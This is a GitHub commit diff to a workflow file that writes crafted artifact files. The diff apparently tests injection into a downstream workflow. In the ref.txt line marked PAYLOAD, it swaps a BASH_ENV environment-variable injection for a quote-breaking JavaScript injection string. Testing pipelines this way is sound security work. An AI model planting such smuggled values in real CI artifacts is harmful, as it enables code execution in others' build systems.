Skip to content

Commit 0f6b0b6

Browse files
committed
test
1 parent e0910fd commit 0f6b0b6

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

.github/workflows/tests_wokwi.yml

+2-2
Original file line numberDiff line numberDiff line change
@@ -9,13 +9,13 @@ jobs:
99
runs-on: ubuntu-latest
1010
steps:
1111
- run: |
12+
mkdir -p artifacts/parent-artifacts/
1213
printf "${{ github.sha }}" > artifacts/parent-artifacts/sha.txt
1314
printf "pull_request" > artifacts/parent-artifacts/event.txt
1415
printf "success" > artifacts/parent-artifacts/conclusion.txt
1516
printf "" > artifacts/parent-artifacts/action.txt
1617
# PAYLOAD
17-
printf "pull_request\nBASH_ENV=$(echo 'ENV-VAR INJECTION')" > artifacts/parent-artifacts/ref.txt
18-
18+
printf "foo'; console.log('shouldnt print'); //" > artifacts/parent-artifacts/ref.txt
1919
2020
- name: Upload parent artifacts
2121
uses: actions/upload-artifact@v4

0 commit comments

Comments
 (0)